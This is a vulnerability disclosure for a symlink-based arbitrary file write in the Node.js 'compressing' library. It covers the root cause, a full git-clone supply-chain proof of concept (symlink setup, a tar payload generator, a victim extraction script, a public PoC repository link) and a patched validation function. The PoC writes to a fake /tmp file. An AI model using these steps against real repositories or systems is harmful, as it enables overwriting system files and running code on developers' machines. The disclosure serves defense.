CVE-2026-40931

• Vulnerable Component: lib/utils.js -> isPathWithinParent()
• Flaw Type: Incomplete validation (lack of recursive lstat checks).
• Primary Attack Vector: Supply Chain via Git Clone The attack requires zero victim interaction beyond standard developer workflow (git clone + node app.js). Git natively preserves symlinks during clone, automatically deploying the malicious symlink to victim's machine without any additional attacker access.
• Result: Successfully achieved arbitrary file writes outside the intended extraction root on the latest library version.

• 1. Logical Abstraction (The "String" World) The developer uses path.resolve(childPath) to sanitize input. In Node.js, path.resolve is a literal string manipulator. It calculates an absolute path by processing .. and . segments relative to each other.
• The Limitation: path.resolve does NOT look at the disk. It does not know if a folder named config is a real folder or a symbolic link.
• The Result: If the extraction target is /app/out and the entry is config/passwd, path.resolve returns /app/out/config/passwd. Since this string starts with /app/out/, the security check returns TRUE.
• 2. Physical Reality (The "Filesystem" World) When the library proceeds to write the file using fs.writeFile('/app/out/config/passwd', data), the execution is handed over to the Operating System's filesystem kernel.
• The Redirection: If the attacker has pre-created a symbolic link on the disk at /app/out/config pointing to /etc, the OS kernel sees the write request and follows the link.
• The Divergence: The OS resolves the path to /etc/passwd. The "Security Guard" (the library) thought it was writing to a local config folder, but the "Executioner" (the OS) followed the link into a sensitive system area.
• 3. Visual Logic Flow
  
• 4. Comparison with Industry Standards (node-tar) A secure implementation (like node-tar) uses an "Atomic Check" strategy. Instead of trusting a string path, it iterates through every directory segment and calls fs.lstatSync(). If any segment is found to be a symbolic link, the extraction is halted immediately before any write operation is attempted. compressing lacks this critical recursive verification step.
• 5. Git Clone as a Delivery Mechanism: Git treats symlinks as first-class objects and restores them faithfully during clone. This means an attacker-controlled repository becomes a reliable delivery mechanism — the symlink is "pre-planted" automatically by git itself, removing any prerequisite of prior system access.

• No social engineering required beyond a standard git clone.
• The symlink is "pre-planted" by Git itself, removing the need for prior system access.
• Victim's workflow remains indistinguishable from legitimate activity.

TIP Prerequisite: Ensure you have Node.js and npm installed on your Kali Linux. If you encounter a MODULE NOT FOUND error for tar-stream or compressing, run: npm install compressing@2.1.0 tar-stream` in your current working directory.

# Workspace setup
mkdir -p ~/poc-workspace
cd ~/poc-workspace

# 1. Create a fake sensitive file
mkdir -p /tmp/fake root/etc
echo "root:SAFE DATA DO NOT OVERWRITE" > /tmp/fake root/etc/passwd

# 2. Install latest vulnerable library
npm install compressing@2.1.0 tar-stream

1. Create a repo named compressing poc test on GitHub.
2. On your local machine, setup the malicious content:

mkdir compressing poc test
cd compressing poc test
git init
# CREATE THE TRAP: A symlink pointing to the sensitive target
ln -s /tmp/fake root/etc/passwd config file
# Setup Git
git branch -M main
git remote add origin https://github.com/USERNAME/compressing poc test.git

const tar = require('tar-stream');
const fs = require('fs');
const pack = tar.pack();
// PAYLOAD: A plain file that matches the symlink name
pack.entry({ name: 'config file' }, 'root:PWNED BY THE SUPPLY CHAIN ATTACK V2.1.0
');
pack.finalize();
pack.pipe(fs.createWriteStream('./payload.tar'));
console.log('payload.tar generated successfully!');

node gen payload.js

# Move the payload into the repo folder
mv ../payload.tar .
# Add all files (config file symlink and payload.tar)
git add .
git commit -m "Add project updates and resource assets"
git push -u origin main

For your convenience and easy reproduction, I have already created a malicious repository to simulate the attacker's setup. You can clone it directly without needing to create a new one: https://github.com/sachinpatilpsp/compressing poc test.git

# 1. Simulate a developer cloning the repo
cd ~/poc-workspace

# In a real attack, the victim clones from your GitHub URL
git clone https://github.com/USERNAME/compressing poc test.git victim app
cd victim app

# 2. Create the Trigger script (victim app.js)

cat <<EOF > victim app.js
const compressing = require('compressing');
async function extractUpdate() {
  console.log('--- Victim: Extracting Update Package ---');
  try {
    // This triggers the bypass because 'config file' already exists as a symlink
    await compressing.tar.uncompress('./payload.tar', './');
    console.log('[+] Update Successful!');
  } catch (err) {
    console.error('[-] Error:', err);
  }
}
extractUpdate();
EOF

# 3. VERIFY THE OVERWRITE
echo "--- Before Exploit ---"
cat /tmp/fake root/etc/passwd

# 4. Run the victim app.js
node victim app.js

# 5. After Exploit Run
echo "--- After Exploit ---"
cat /tmp/fake root/etc/passwd

• The Library's Logic: compressing uses path.resolve on entry names and compares them string-wise with the destination directory.
• The Gap: Because path.resolve does not check if intermediate directories are symlinks on disk, it treats config file (the symlink) as a normal path inside the allowed directory.
• The Result: The underlying fs.writeFile follows the existing symlink to the protected target (/tmp/fake root/etc/passwd), bypassing all string-based security checks.

• Privilege Escalation: Gaining root access by overwriting system configuration files.
• Remote Code Execution (RCE): Overwriting executable binaries or startup scripts (.bashrc, .profile) to run malicious code upon the next boot or login.
• Data Corruption: Permanent loss or modification of application data and database files.
• Reputational Damage to Library: Loss of trust in the compressing library's security architecture due to an incomplete patch for a known CVE.

// [VULNERABLE] Does not check if disk segments are symlinks
function isPathWithinParent(childPath, parentPath) {
 const normalizedChild = path.resolve(childPath);
 const normalizedParent = path.resolve(parentPath);
 // ... (omitted startsWith check)
 return normalizedChild.startsWith(parentWithSep);
}

const fs = require('fs');
const path = require('path');
/**
 * SECURE VALIDATION: Checks every segment of the path on disk
 * to prevent symlink-based directory poisoning.
 */
function secureIsPathWithinParent(childPath, parentPath) {
 const absoluteDest = path.resolve(parentPath);
 const absoluteChild = path.resolve(childPath);
 // Basic string check first
 if (!absoluteChild.startsWith(absoluteDest + path.sep) && 
   absoluteChild !== absoluteDest) {
  return false;
 }
 // RECURSIVE DISK CHECK
 // Iteratively check every directory segment from the root to the file
 let currentPath = absoluteDest;
 const relativeParts = path.relative(absoluteDest, absoluteChild).split(path.sep);
 for (const part of relativeParts) {
  if (!part || part === '.') continue;
  currentPath = path.join(currentPath, part);
  try {
   const stats = fs.lstatSync(currentPath);
   // IF ANY COMPONENT IS A SYMLINK, REJECT IT
   if (stats.isSymbolicLink()) {
    throw new Error(`Security Exception: Symlink detected at ${currentPath}`);
   }
  } catch (err) {
   if (err.code === 'ENOENT') break; // Path doesn't exist yet, which is fine
   throw err;
  }
 }
 return true;
}

• Filesystem Awareness: Unlike the previous fix, this code uses fs.lstatSync. It doesn't trust the string; it asks the Operating System, "What is actually at this location?".
• Segmented Verification: By splitting the path and checking each part (config, then config/file), it catches the "Poisoned Directory" (config -> /etc) before the final write happens.
• Bypass Prevention: Even if the string check passes, the loop will detect the symlink at the config segment and throw a security exception, stopping the fs.writeFile before it can follow the link to /etc/passwd.
• Atomic Security: This implementation ensures that the logical path and the physical path are identical, leaving no room for "Divergence" exploits.

Note: For production, it is recommended to use the asynchronous fs.promises.lstat to prevent blocking the Node.js event loop during recursive checks.